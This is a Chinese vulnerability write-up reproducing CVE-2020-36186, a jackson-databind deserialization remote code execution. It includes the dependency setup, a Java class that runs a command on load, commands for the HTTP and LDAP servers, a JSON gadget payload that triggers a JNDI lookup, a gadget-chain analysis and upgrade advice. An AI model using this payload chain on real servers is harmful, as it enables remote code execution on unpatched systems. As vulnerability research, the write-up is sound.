CVE-2020-36186:jackson-databind RCE

admin 2022年7月28日22:54:31评论18 views字数 2307阅读7分41秒阅读模式

影响范围

Jackson-databind < 2.9.10.7

漏洞类型

JDNI注入导致RCE

利用条件

  • 开启enableDefaultTyping()

  • 使用了commons-dbcp第三方依赖库

漏洞概述

org.apache.tomcat.dbcp.dbcp.datasources.PerUserPoolDataSource类绕过了之前jackson-databind维护的黑名单类,并且JDK版本较低的话,可造成RCE。

漏洞复现

环境搭建

pom文件如下:

   <dependencies>        <dependency>            <groupId>com.fasterxml.jackson.core</groupId>            <artifactId>jackson-databind</artifactId>            <version>2.9.10.7</version>        </dependency>        <!-- https://mvnrepository.com/artifact/tomcat/naming-factory-dbcp -->        <dependency>            <groupId>tomcat</groupId>            <artifactId>naming-factory-dbcp</artifactId>            <version>5.5.23</version>        </dependency>                <dependency>            <groupId>org.slf4j</groupId>            <artifactId>slf4j-nop</artifactId>            <version>1.7.2</version>        </dependency>        <!-- https://mvnrepository.com/artifact/javax.transaction/jta -->        <dependency>            <groupId>javax.transaction</groupId>            <artifactId>jta</artifactId>            <version>1.1</version>        </dependency>    </dependencies>


漏洞利用

这里使用LDAP的利用方式进行漏洞的利用演示,RMI的方式也是类似的,且RMI比LDAP要对JDK版本有很大的局限性~

LDAP利用方式:jdk版本:JDK 11.0.1、8u191、7u201、6u211之前,笔者这里采用JDK 1.8.0_181

编译Exploit.java

Exploit.java代码如下:

import java.lang.Runtime;
public class Exploit { static { try { Runtime.getRuntime().exec("calc"); } catch (Exception e) { e.printStackTrace(); } }}

编译Exploit.java文件:

CVE-2020-36186:jackson-databind RCE

搭建HTTP服务

使用Python搭建简易SimpleHTTPServer服务:

python -m  SimpleHTTPServer 4444

CVE-2020-36186:jackson-databind RCE


搭建LDAP服务

使用marshalsec来启动一个LDAP服务:

CVE-2020-36186:jackson-databind RCE

执行漏洞POC

Poc.java代码如下所示:

import com.fasterxml.jackson.databind.ObjectMapper;import com.fasterxml.jackson.databind.SerializationFeature;

public class POC { public static void main(String[] args) throws Exception { ObjectMapper mapper = new ObjectMapper(); mapper.enableDefaultTyping(); mapper.configure(SerializationFeature.FAIL_ON_EMPTY_BEANS, false); String json = "["org.apache.tomcat.dbcp.dbcp.datasources.PerUserPoolDataSource", {"dataSourceName":"ldap://127.0.0.1:1288/Exploit"}]"; Object obj = mapper.readValue(json, Object.class); mapper.writeValueAsString(obj);
}}

之后运行该程序,成功执行命令,弹出计算器:

CVE-2020-36186:jackson-databind RCE

漏洞分析

PerUserPoolDataSource类继承自InstanceKeyDataSource:

CVE-2020-36186:jackson-databind RCE

InstanceKeyDataSource类中存在一处JNDI注入:

CVE-2020-36186:jackson-databind RCE

testCPDS在PerUserPoolDataSource类的registerPool中被调用:

CVE-2020-36186:jackson-databind RCE

registerPool在getPooledConnectionAndInfo中被调用:

CVE-2020-36186:jackson-databind RCE

所以可以构造以下Gadget:

PerUserPoolDataSource  ->InstanceKeyDataSource.setDataSourceName      ->PerUserPoolDataSource.getPooledConnectionAndInfo          ->PerUserPoolDataSource.registerPool              ->PerUserPoolDataSource.testCPDS                  ->lookup

修复建议

  • 及时将jackson-databind升级到安全版本(>=2.9.10.7)

  • 升级到较高版本的JDK

原文始发于微信公众号(七芒星实验室):CVE-2020-36186:jackson-databind RCE

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年7月28日22:54:31
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2020-36186:jackson-databind RCEhttp://cn-sec.com/archives/1208032.html

发表评论

匿名网友 填写信息